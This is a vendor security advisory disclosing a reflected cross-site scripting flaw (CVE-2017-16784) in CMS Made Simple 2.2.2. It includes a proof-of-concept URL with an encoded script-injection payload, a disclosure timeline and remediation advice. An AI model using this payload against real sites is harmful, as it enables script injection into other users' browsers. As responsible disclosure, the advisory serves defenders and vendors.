Advisory by Netsparker
Name: Reflected XSS Vulnerability in CMS Made Simple
Affected Software : CMS Made Simple
Affected Versions: 2.2.2
Homepage :
Vulnerability Type :  Reflected XSS
Severity : Important
Status : Fixed
CVE-ID : CVE-2017-16784
CVSS Base Score (3.0) :6.3
CVSS Vector String(3.0):  AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
Netsparker Advisory Reference : NS-17-31
Proof of concept write up:

Technical Details

Proof of Concept URL for XSS vulnerability in CMS Made Simple ;

URL: index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=%2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Ealert%25280x001168%2529%253C%252FscRipt%253E&cntnt01returnid=1
Parameter Name: cntnt01detailtemplate
Parameter Type: GET
Attack Pattern: %2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Ealert%25280x001168%2529%253C%252FscRipt%253E

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline

11 July 2017 - First Contact
26 Aug 2017 - Vendor Fixed
09 Nov 2017 - Advisory Released


The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context.

Credits & Authors

These issues have been discovered by Mithat Gogebakan while testing Netsparker Web Application Security Scanner.

About Netsparker

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Enterprise. Visit our website for more information.